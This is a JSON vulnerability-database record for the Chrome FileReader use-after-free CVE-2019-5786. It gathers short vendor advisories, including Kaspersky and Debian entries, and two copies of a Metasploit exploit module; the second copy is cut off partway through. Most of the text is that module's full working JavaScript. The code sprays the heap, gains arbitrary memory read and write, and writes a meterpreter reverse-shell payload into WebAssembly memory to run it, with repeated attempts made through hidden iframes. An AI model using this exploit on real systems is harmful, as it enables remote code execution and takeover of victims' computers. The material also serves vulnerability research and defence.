code.\n\n### *Affected products*:\nGoogle Chrome earlier than 72.0.3626.121\n\n### *Solution*:\nUpdate to the latest version \n[Google Chrome download page](<https://www.google.com/chrome/browser/desktop/>)\n\n### *Original advisories*:\n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2019-5786](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5786>)0.0Unknown\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).", "edition": 4, "modified": "2020-06-18T00:00:00", "published": "2019-03-01T00:00:00", "id": "KLA11430", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11430", "title": "\r KLA11430ACE vulnerability in Google Chrome ", "type": "kaspersky", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-09-02T11:45:14", "bulletinFamily": "info", "cvelist": ["CVE-2019-5802", "CVE-2019-5789", "CVE-2019-5803", "CVE-2019-5792", "CVE-2019-5801", "CVE-2019-5793", "CVE-2019-5804", "CVE-2019-5797", "CVE-2019-5798", "CVE-2019-5795", "CVE-2019-5786", "CVE-2019-5799", "CVE-2019-5796", "CVE-2019-5791", "CVE-2019-5790", "CVE-2019-5794", "CVE-2019-5800", "CVE-2019-5788", "CVE-2019-5787"], "description": "### *Detect date*:\n03/12/2019\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple vulnerabilities were found in Google Chrome. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service, bypass security restrictions or spoof user interface.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nGoogle Chrome earlier than 73.0.3683.75\n\n### *Solution*:\nUpdate to the latest version. File with name old_chrome can be still detected after update. It caused by Google Chrome update policy which does not remove old versions when installing updates. Try to contact vendor for further delete instructions or ignore such kind of alerts at your own risk. \n[Google Chrome download page](<https://www.google.com/chrome/browser/desktop/>)\n\n### *Original advisories*:\n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop_12.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2019-5786](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5786>)0.0Unknown \n[CVE-2019-5802](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5802>)0.0Unknown \n[CVE-2019-5791](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5791>)0.0Unknown \n[CVE-2019-5801](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5801>)0.0Unknown \n[CVE-2019-5798](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5798>)0.0Unknown \n[CVE-2019-5787](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5787>)0.0Unknown \n[CVE-2019-5792](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5792>)0.0Unknown \n[CVE-2019-5793](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5793>)0.0Unknown \n[CVE-2019-5800](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5800>)0.0Unknown \n[CVE-2019-5804](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5804>)0.0Unknown \n[CVE-2019-5803](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5803>)0.0Unknown \n[CVE-2019-5788](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5788>)0.0Unknown \n[CVE-2019-5790](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5790>)0.0Unknown \n[CVE-2019-5799](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5799>)0.0Unknown \n[CVE-2019-5789](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5789>)0.0Unknown \n[CVE-2019-5794](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5794>)0.0Unknown \n[CVE-2019-5796](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5796>)0.0Unknown \n[CVE-2019-5795](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5795>)0.0Unknown \n[CVE-2019-5797](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5797>)0.0Unknown", "edition": 1, "modified": "2020-06-18T00:00:00", "published": "2019-03-12T00:00:00", "id": "KLA11436", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11436", "title": "\r KLA11436Multiple vulnerabilities in Google Chrome ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-08-12T01:02:51", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5786"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4404-1 security@debian.org\nhttps://www.debian.org/security/ Michael Gilbert\nMarch 09, 2019 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium\nCVE ID : CVE-2019-5786\n\nClement Lecigne discovered a use-after-free issue in chromium's file\nreader implementation. A maliciously crafted file could be used to\nremotely execute arbitrary code because of this problem.\n\nThis update also fixes a regression introduced in a previous update. The\nbrowser would always crash when launched in remote debugging mode.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 72.0.3626.122-1~deb9u1.\n\nWe recommend that you upgrade your chromium packages.\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/chromium\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2019-03-10T04:09:57", "published": "2019-03-10T04:09:57", "id": "DEBIAN:DSA-4404-1:0557C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2019/msg00048.html", "title": "[SECURITY] [DSA 4404-1] chromium security update", "type": "debian", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2019-05-10T19:45:08", "description": "", "published": "2019-05-08T00:00:00", "type": "packetstorm", "title": "Chrome 72.0.3626.119 FileReader Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5786"], "modified": "2019-05-08T00:00:00", "id": "PACKETSTORM:152772", "href": "https://packetstormsecurity.com/files/152772/Chrome-72.0.3626.119-FileReader-Use-After-Free.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86', \n'Description' => %q{ \nThis exploit takes advantage of a use after free vulnerability in Google \nChrome 72.0.3626.119 running on Windows 7 x86. \nThe FileReader.readAsArrayBuffer function can return multiple references to the \nsame ArrayBuffer object, which can be freed and overwritten with sprayed objects. \nThe dangling ArrayBuffer reference can be used to access the sprayed objects, \nallowing arbitrary memory access from Javascript. This is used to write and \nexecute shellcode in a WebAssembly object. \nThe shellcode is executed within the Chrome sandbox, so you must explicitly \ndisable the sandbox for the payload to be successful. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Clement Lecigne', # discovery \n'Istv\u00e1n Kurucsai', # Exodus Intel \n'timwr', # metasploit module \n], \n'References' => [ \n['CVE', '2019-5786'], \n['URL', 'https://github.com/exodusintel/CVE-2019-5786'], \n['URL', 'https://blog.exodusintel.com/2019/03/20/cve-2019-5786-analysis-and-exploitation/'], \n['URL', 'https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/analysis-of-a-chrome-zero-day-cve-2019-5786/'], \n['URL', 'https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html'], \n], \n'Arch' => [ ARCH_X86 ], \n'Platform' => 'windows', \n'DefaultTarget' => 0, \n'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }, \n'Targets' => [ [ 'Automatic', { } ] ], \n'DisclosureDate' => 'Mar 21 2019')) \nend \n \ndef on_request_uri(cli, request) \nprint_status(\"Sending #{request.uri}\") \nif request.uri =~ %r{/exploit.html$} \nhtml = %Q^ \n<html> \n<head> \n<script> \nlet myWorker = new Worker('worker.js'); \nlet reader = null; \nspray = null; // nested arrays used to hold the sprayed heap contents \nlet onprogress_cnt = 0; // number of times onprogress was called in a round \nlet try_cnt = 0; // number of rounds we tried \nlet last = 0, lastlast = 0; // last two AB results from the read \nlet tarray = 0; // TypedArray constructed from the dangling ArrayBuffer \nconst string_size = 128 * 1024 * 1024; \nlet contents = String.prototype.repeat.call('Z', string_size); \nlet f = new File([contents], \"text.txt\"); \nconst marker1 = 0x36313233; \nconst marker2 = 0x37414546; \n \nconst outers = 256; \nconst inners = 1024; \n \nfunction allocate_spray_holders() { \nspray = new Array(outers); \nfor (let i = 0; i < outers; i++) { \nspray[i] = new Array(inners); \n} \n} \n \nfunction clear_spray() { \nfor (let i = 0; i < outers; i++) { \nfor (let j = 0; j < inners; j++) { \nspray[i][j] = null; \n} \n} \n} \n \nfunction reclaim_mixed() { \n// spray the heap to reclaim the freed region \nlet tmp = {}; \nfor (let i = 0; i < outers; i++) { \nfor (let j = 0; j + 2 < inners; j+=3) { \nspray[i][j] = {a: marker1, b: marker2, c: tmp}; \nspray[i][j].c = spray[i][j] // self-reference to find our absolute address \nspray[i][j+1] = new Array(8); \nspray[i][j+2] = new Uint32Array(32); \n} \n} \n} \n \nfunction find_pattern() { \nconst start_offset = 0x00afc000 / 4; \nfor (let i = start_offset; i + 1 < string_size / 4; i++) { \nif (i < 50){ \nconsole.log(tarray[i].toString(16)); \n} \n// multiply by two because of the way SMIs are stored \nif (tarray[i] == marker1 * 2) { \nif (tarray[i+1] == marker2 * 2) { \nconsole.log(`found possible candidate objectat idx ${i}`); \nreturn i; \n} \n} \n} \nreturn null; \n} \n \n \nfunction get_obj_idx(prop_idx) { \n// find the index of the Object in the spray array \ntarray[prop_idx] = 0x62626262; \nfor (let i = 0; i < outers; i++) { \nfor (let j = 0; j < inners; j+=1) { \ntry { \nif (spray[i][j].a == 0x31313131) { \nconsole.log(`found object idx in the spray array: ${i} ${j}`); \nreturn spray[i][j]; \n} \n} catch (e) {} \n} \n} \n} \n \nfunction ta_read(addr) { \n// reads an absolute address through the original freed region \n// only works for ta_absolute_addr + string_size (128MiB) \nif (addr > ta_absolute_addr && addr < ta_absolute_addr + string_size) { \nreturn tarray[(addr-ta_absolute_addr)/4]; \n} \n \nreturn 0; \n} \n \nfunction ta_write(addr, value) { \n// wrtie to an absolute address through the original freed region \n// only works for ta_absolute_addr + string_size (128MiB) \nif (addr % 4 || value > 2**32 - 1 || \naddr < ta_absolute_addr || \naddr > ta_absolute_addr + string_size) { \nconsole.log(`invalid args passed to ta_write(${addr.toString(16)}, ${value}`); \n} \ntarray[(addr-ta_absolute_addr)/4] = value; \n} \n \nfunction get_corruptable_ui32a() { \n// finds a sprayed Uint32Array, the elements pointer of which also falls into the controlled region \nfor (let i = 0; i < outers; i++) { \nfor (let j = 0; j + 2 < inners; j+=3) { \nlet ui32a_addr = addrof(spray[i][j+2]) - 1; \nlet bs_addr = ta_read(ui32a_addr + 12) - 1; \nlet elements_addr = ta_read(ui32a_addr + 8) - 1; \n// read its elements pointer \n// if the elements ptr lies inside the region we have access to \nif (bs_addr >= ta_absolute_addr && bs_addr < ta_absolute_addr + string_size && \nelements_addr >= ta_absolute_addr && elements_addr < ta_absolute_addr + string_size) { \nconsole.log(`found corruptable Uint32Array->elements at ${bs_addr.toString(16)}, on Uint32Array idx ${i} ${j}`); \nreturn { \nbs_addr: bs_addr, \nelements_addr: elements_addr, \nui32: spray[i][j+2], \ni: i, j: j \n} \n} \n} \n} \n} \n \nvar reader_obj = null; \nvar object_prop_taidx = null; \nvar ta_absolute_addr = null; \nvar aarw_ui32 = null; \n \nfunction addrof(leaked_obj) { \nreader_obj.a = leaked_obj; \nreturn tarray[object_prop_taidx]; \n} \n \n \nfunction read4(addr) { \n// save the old values \nlet tmp1 = ta_read(aarw_ui32.elements_addr + 12); \nlet tmp2 = ta_read(aarw_ui32.bs_addr + 16); \n \n// rewrite the backing store ptr \nta_write(aarw_ui32.elements_addr + 12, addr); \nta_write(aarw_ui32.bs_addr + 16, addr); \n \nlet val = aarw_ui32.ui32[0]; \n \nta_write(aarw_ui32.elements_addr + 12, tmp1); \nta_write(aarw_ui32.bs_addr + 16, tmp2); \n \nreturn val; \n} \n \nfunction write4(addr, val) { \n// save the old values \nlet tmp1 = ta_read(aarw_ui32.elements_addr + 12); \nlet tmp2 = ta_read(aarw_ui32.bs_addr + 16); \n \n// rewrite the backing store ptr \nta_write(aarw_ui32.elements_addr + 12, addr); \nta_write(aarw_ui32.bs_addr + 16, addr); \n \naarw_ui32.ui32[0] = val; \n \nta_write(aarw_ui32.elements_addr + 12, tmp1); \nta_write(aarw_ui32.bs_addr + 16, tmp2); \n} \n \nfunction get_rw() { \n// free up as much memory as possible \n// spray = null; \n// contents = null; \nforce_gc(); \n \n// attepmt reclaiming the memory pointed to by dangling pointer \nreclaim_mixed(); \n \n// access the reclaimed region as a Uint32Array \ntarray = new Uint32Array(lastlast); \nobject_prop_taidx = find_pattern(); \nif (object_prop_taidx === null) { \nconsole.log('ERROR> failed to find marker'); \nwindow.top.postMessage(`ERROR> failed to find marker`, '*'); \nreturn; \n} \n \n// leak the absolute address of the Object \nconst obj_absolute_addr = tarray[object_prop_taidx + 2] - 1; // the third property of the sprayed Object is self-referential \nta_absolute_addr = obj_absolute_addr - (object_prop_taidx-3)*4 \nconsole.log(`leaked absolute address of our object ${obj_absolute_addr.toString(16)}`); \nconsole.log(`leaked absolute address of ta ${ta_absolute_addr.toString(16)}`); \n \nreader_obj = get_obj_idx(object_prop_taidx); \nif (reader_obj == undefined) { \nconsole.log(`ERROR> failed to find object`); \nwindow.top.postMessage(`ERROR> failed to find object`, '*'); \nreturn; \n} \n// now reader_obj is a reference to the Object, object_prop_taidx is the index of its first inline property from the beginning of tarray \n \nconsole.log(`addrof(reader_obj) == ${addrof(reader_obj)}`); \naarw_ui32 = get_corruptable_ui32a(); \n// arbitrary read write up after this point \n} \n \nvar wfunc = null; \nlet meterpreter = unescape(\"#{Rex::Text.to_unescape(payload.encoded)}\"); \n \nfunction rce() { \nfunction get_wasm_func() { \nvar importObject = { \nimports: { imported_func: arg => console.log(arg) } \n}; \nbc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb]; \nwasm_code = new Uint8Array(bc); \nwasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject); \nreturn wasm_mod.exports.exported_func; \n} \n \nlet wasm_func = get_wasm_func(); \nwfunc = wasm_func; \n// traverse the JSFunction object chain to find the RWX WebAssembly code page \nlet wasm_func_addr = addrof(wasm_func) - 1; \nlet sfi = read4(wasm_func_addr + 12) - 1; \nlet WasmExportedFunctionData = read4(sfi + 4) - 1; \nlet instance = read4(WasmExportedFunctionData + 8) - 1; \nlet rwx_addr = read4(instance + 0x74); \n \n// write the shellcode to the RWX page \nif (meterpreter.length % 2 != 0) \nmeterpreter += \"\\\\u9090\"; \n \nfor (let i = 0; i < meterpreter.length; i += 2) { \nwrite4(rwx_addr + i*2, meterpreter.charCodeAt(i) + meterpreter.charCodeAt(i + 1) * 0x10000); \n} \n \n// if we got to this point, the exploit was successful \nwindow.top.postMessage('SUCCESS', '*'); \nconsole.log('success'); \nwfunc(); \n \n// invoke the shellcode \n//window.setTimeout(wfunc, 1000); \n} \n \nfunction force_gc() { \n// forces a garbage collection to avoid OOM kills \ntry { \nvar failure = new WebAssembly.Memory({initial: 32767}); \n} catch(e) { \n// console.log(e.message); \n} \n} \n \nfunction init() { \nabs = []; \ntarray = 0; \nonprogress_cnt = 0; \ntry_cnt = 0; \nlast = 0, lastlast = 0; \nreader = new FileReader(); \n \nreader.onloadend = function(evt) { \ntry_cnt += 1; \nfailure = false; \nif (onprogress_cnt < 2) { \nconsole.log(`less than 2 onprogress events triggered: ${onprogress_cnt}, try again`); \nfailure = true; \n} \n \nif (lastlast.byteLength != f.size) { \nconsole.log(`lastlast has a different size than expected: ${lastlast.byteLength}`); \nfailure = true; \n} \n \nif (failure === true) { \nconsole.log('retrying in 1 second'); \nwindow.setTimeout(exploit, 1); \nreturn; \n} \n \nconsole.log(`onloadend attempt ${try_cnt} after ${onprogress_cnt} onprogress callbacks`); \ntry { \n// trigger the FREE \nmyWorker.postMessage([last], [last, lastlast]); \n} catch(e) { \n// an exception with this message indicates that the FREE part of the exploit was successful \nif (e.message.includes('ArrayBuffer at index 1 could not be transferred')) { \nget_rw(); \nrce(); \nreturn; \n} else { \nconsole.log(e.message); \n} \n} \n} \nreader.onprogress = function(evt) { \nforce_gc(); \nlet res = evt.target.result; \n// console.log(`onprogress ${onprogress_cnt}`); \nonprogress_cnt += 1; \nif (res.byteLength != f.size) { \n// console.log(`result has a different size than expected: ${res.byteLength}`); \nreturn; \n} \nlastlast = last; \nlast = res; \n} \nif (spray === null) { \n// allocate the spray holders if needed \nallocate_spray_holders(); \n} \n \n// clear the spray holder arrays \nclear_spray(); \n \n// get rid of the reserved ArrayBuffer range, as it may interfere with the exploit \ntry { \nlet failure = new ArrayBuffer(1024 * 1024 * 1024); \n} catch (e) { \nconsole.log(e.message); \n} \n \nforce_gc(); \n} \n \nfunction exploit() { \ninit(); \nreader.readAsArrayBuffer(f); \nconsole.log(`attempt ${try_cnt} started`); \n} \n</script> \n</head> \n<body onload=\"exploit()\"> \n</body> \n</html> \n^ \nsend_response(cli, html) \nelsif request.uri =~ %r{/worker.js$} \nsend_response(cli, 'onmessage = function (msg) { }') \nelse \nuripath = datastore['URIPATH'] || get_resource \nuripath += '/' unless uripath.end_with? '/' \nhtml = %Q^ \n<html> \n<head> \n<script> \nfunction iter() { \nlet iframe = null; \ntry { \niframe = document.getElementById('myframe'); \ndocument.body.removeChild(iframe); \n} catch (e) {} \n \niframe = document.createElement('iframe'); \niframe.src = '#{uripath}exploit.html'; \niframe.id = 'myframe'; \niframe.style = \"width:0; height:0; border:0; border:none; visibility=hidden\" \ndocument.body.appendChild(iframe); \nconsole.log(document.getElementById('myframe')); \n} \n \nfunction brute() { \nwindow.setTimeout(iter, 1000); \nlet interval = window.setInterval(iter, 15000); \n \nwindow.onmessage = function(e) { \nif (e.data.includes('SUCCESS')) { \nconsole.log('exploit successful!'); \nwindow.clearInterval(interval); \n} \nconsole.log(e); \n} \n} \n</script> \n</head> \n<body onload=\"brute()\"></body> \n</html> \n^ \nsend_response(cli, html) \nend \nend \n \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/152772/chrome_filereader_uaf.rb.txt"}], "nodejs": [{"lastseen": "2020-09-29T11:10:43", "bulletinFamily": "software", "cvelist": ["CVE-2019-5786"], "description": "## Overview\n\nVersions of `puppeteer` prior to 1.13.0 are vulnerable to the Use-After-Free vulnerability in Chromium (CVE-2019-5786). The Chromium FileReader API is vulnerable to Use-After-Free which may lead to Remote Code Execution.\n\n## Recommendation\n\nUpgrade to version 1.13.0 or later.\n\n## References\n\n- [GitHub Issue](https://github.com/GoogleChrome/puppeteer/issues/4141)\n- [Snyk Report](https://snyk.io/vuln/SNYK-JS-PUPPETEER-174321)\n- [CVE-2019-5786 Analysis by Exodus Intelligence](https://blog.exodusintel.com/2019/03/20/cve-2019-5786-analysis-and-exploitation/)", "modified": "2019-04-19T21:33:38", "published": "2019-04-19T21:33:38", "id": "NODEJS:824", "href": "https://www.npmjs.com/advisories/824", "type": "nodejs", "title": "Use-After-Free", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "github": [{"lastseen": "2020-09-02T21:31:23", "bulletinFamily": "software", "cvelist": ["CVE-2019-5786"], "description": "Versions of `puppeteer` prior to 1.13.0 are vulnerable to the Use-After-Free vulnerability in Chromium (CVE-2019-5786). The Chromium FileReader API is vulnerable to Use-After-Free which may lead to Remote Code Execution.\n\n\n## Recommendation\n\nUpgrade to version 1.13.0 or later.", "edition": 1, "modified": "2020-09-02T18:25:43", "published": "2020-09-02T18:25:43", "id": "GHSA-C2GP-86P4-5935", "href": "https://github.com/advisories/GHSA-c2gp-86p4-5935", "title": "Use-After-Free in puppeteer", "type": "github", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "zdt": [{"lastseen": "2019-05-08T23:59:07", "description": "This exploit takes advantage of a use after free vulnerability in Google Chrome 72.0.3626.119 running on Windows 7 x86. The FileReader.readAsArrayBuffer function can return multiple references to the same ArrayBuffer object, which can be freed and overwritten with sprayed objects. The dangling ArrayBuffer reference can be used to access the sprayed objects, allowing arbitrary memory access from Javascript. This is used to write and execute shellcode in a WebAssembly object. The shellcode is executed within the Chrome sandbox, so you must explicitly disable the sandbox for the payload to be successful.", "edition": 1, "published": "2019-05-08T00:00:00", "title": "Chrome 72.0.3626.119 FileReader Use-After-Free Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5786"], "modified": "2019-05-08T00:00:00", "id": "1337DAY-ID-32669", "href": "https://0day.today/exploit/description/32669", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86',\r\n 'Description' => %q{\r\n This exploit takes advantage of a use after free vulnerability in Google\r\n Chrome 72.0.3626.119 running on Windows 7 x86.\r\n The FileReader.readAsArrayBuffer function can return multiple references to the\r\n same ArrayBuffer object, which can be freed and overwritten with sprayed objects.\r\n The dangling ArrayBuffer reference can be used to access the sprayed objects,\r\n allowing arbitrary memory access from Javascript. This is used to write and\r\n execute shellcode in a WebAssembly object.\r\n The shellcode is executed within the Chrome sandbox, so you must explicitly\r\n disable the sandbox for the payload to be successful.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Clement Lecigne', # discovery\r\n 'Istv\u00e1n Kurucsai', # Exodus Intel\r\n 'timwr', # metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2019-5786'],\r\n ['URL', 'https://github.com/exodusintel/CVE-2019-5786'],\r\n ['URL', 'https://blog.exodusintel.com/2019/03/20/cve-2019-5786-analysis-and-exploitation/'],\r\n ['URL', 'https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/analysis-of-a-chrome-zero-day-cve-2019-5786/'],\r\n ['URL', 'https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html'],\r\n ],\r\n 'Arch' => [ ARCH_X86 ],\r\n 'Platform' => 'windows',\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },\r\n 'Targets' => [ [ 'Automatic', { } ] ],\r\n 'DisclosureDate' => 'Mar 21 2019'))\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n print_status(\"Sending #{request.uri}\")\r\n if request.uri =~ %r{/exploit.html$}\r\n html = %Q^\r\n<html>\r\n <head>\r\n <script>\r\nlet myWorker = new Worker('worker.js');\r\nlet reader = null;\r\nspray = null; // nested arrays used to hold the sprayed heap contents\r\nlet onprogress_cnt = 0; // number of times onprogress was called in a round\r\nlet try_cnt = 0; // number of rounds we tried\r\nlet last = 0, lastlast = 0; // last two AB results from the read\r\nlet tarray = 0; // TypedArray constructed from the dangling ArrayBuffer\r\nconst string_size = 128 * 1024 * 1024;\r\nlet contents = String.prototype.repeat.call('Z', string_size);\r\nlet f = new File([contents], \"text.txt\");\r\nconst marker1 = 0x36313233;\r\nconst marker2 = 0x37414546;\r\n\r\nconst outers = 256;\r\nconst inners = 1024;\r\n\r\nfunction allocate_spray_holders() {\r\n spray = new Array(outers);\r\n for (let i = 0; i < outers; i++) {\r\n spray[i] = new Array(inners);\r\n }\r\n}\r\n\r\nfunction clear_spray() {\r\n for (let i = 0; i < outers; i++) {\r\n for (let j = 0; j < inners; j++) {\r\n spray[i][j] = null;\r\n }\r\n }\r\n}\r\n\r\nfunction reclaim_mixed() {\r\n // spray the heap to reclaim the freed region\r\n let tmp = {};\r\n for (let i = 0; i < outers; i++) {\r\n for (let j = 0; j + 2 < inners; j+=3) {\r\n spray[i][j] = {a: marker1, b: marker2, c: tmp};\r\n spray[i][j].c = spray[i][j] // self-reference to find our absolute address\r\n spray[i][j+1] = new Array(8);\r\n spray[i][j+2] = new Uint32Array(32);\r\n }\r\n }\r\n}\r\n\r\nfunction find_pattern() {\r\n const start_offset = 0x00afc000 / 4;\r\n for (let i = start_offset; i + 1 < string_size / 4; i++) {\r\n if (i < 50){\r\n console.log(tarray[i].toString(16));\r\n }\r\n // multiply by two because of the way SMIs are stored\r\n if (tarray[i] == marker1 * 2) {\r\n if (tarray[i+1] == marker2 * 2) {\r\n console.log(`found possible candidate objectat idx ${i}`);\r\n return i;\r\n }\r\n }\r\n }\r\n return null;\r\n}\r\n\r\n\r\nfunction get_obj_idx(prop_idx) {\r\n // find the index of the Object in the spray array\r\n tarray[prop_idx] = 0x62626262;\r\n for (let i = 0; i < outers; i++) {\r\n for (let j = 0; j < inners; j+=1) {\r\n try {\r\n if (spray[i][j].a == 0x31313131) {\r\n console.log(`found object idx in the spray array: ${i} ${j}`);\r\n return spray[i][j];\r\n }\r\n } catch (e) {}\r\n }\r\n }\r\n}\r\n\r\nfunction ta_read(addr) {\r\n // reads an absolute address through the original freed region\r\n // only works for ta_absolute_addr + string_size (128MiB)\r\n if (addr > ta_absolute_addr && addr < ta_absolute_addr + string_size) {\r\n return tarray[(addr-ta_absolute_addr)/4];\r\n }\r\n\r\n return 0;\r\n}\r\n\r\nfunction ta_write(addr, value) {\r\n // wrtie to an absolute address through the original freed region\r\n // only works for ta_absolute_addr + string_size (128MiB)\r\n if (addr % 4 || value > 2**32 - 1 ||\r\n addr < ta_absolute_addr ||\r\n addr > ta_absolute_addr + string_size) {\r\n console.log(`invalid args passed to ta_write(${addr.toString(16)}, ${value}`);\r\n }\r\n tarray[(addr-ta_absolute_addr)/4] = value;\r\n}\r\n\r\nfunction get_corruptable_ui32a() {\r\n // finds a sprayed Uint32Array, the elements pointer of which also falls into the controlled region\r\n for (let i = 0; i < outers; i++) {\r\n for (let j = 0; j + 2 < inners; j+=3) {\r\n let ui32a_addr = addrof(spray[i][j+2]) - 1;\r\n let bs_addr = ta_read(ui32a_addr + 12) - 1;\r\n let elements_addr = ta_read(ui32a_addr + 8) - 1;\r\n // read its elements pointer\r\n // if the elements ptr lies inside the region we have access to\r\n if (bs_addr >= ta_absolute_addr && bs_addr < ta_absolute_addr + string_size &&\r\n elements_addr >= ta_absolute_addr && elements_addr < ta_absolute_addr + string_size) {\r\n console.log(`found corruptable Uint32Array->elements at ${bs_addr.toString(16)}, on Uint32Array idx ${i} ${j}`);\r\n return {\r\n bs_addr: bs_addr,\r\n elements_addr: elements_addr,\r\n ui32: spray[i][j+2],\r\n i: i, j: j\r\n }\r\n }\r\n }\r\n }\r\n}\r\n\r\nvar reader_obj = null;\r\nvar object_prop_taidx = null;\r\nvar ta_absolute_addr = null;\r\nvar aarw_ui32 = null;\r\n\r\nfunction addrof(leaked_obj) {\r\n reader_obj.a = leaked_obj;\r\n return tarray[object_prop_taidx];\r\n}\r\n\r\n\r\nfunction read4(addr) {\r\n // save the old values\r\n let tmp1 = ta_read(aarw_ui32.elements_addr + 12);\r\n let tmp2 = ta_read(aarw_ui32.bs_addr + 16);\r\n\r\n // rewrite the backing store ptr\r\n ta_write(aarw_ui32.elements_addr + 12, addr);\r\n ta_write(aarw_ui32.bs_addr + 16, addr);\r\n\r\n let val = aarw_ui32.ui32[0];\r\n\r\n ta_write(aarw_ui32.elements_addr + 12, tmp1);\r\n ta_write(aarw_ui32.bs_addr + 16, tmp2);\r\n\r\n return val;\r\n}\r\n\r\nfunction write4(addr, val) {\r\n // save the old values\r\n let tmp1 = ta_read(aarw_ui32.elements_addr 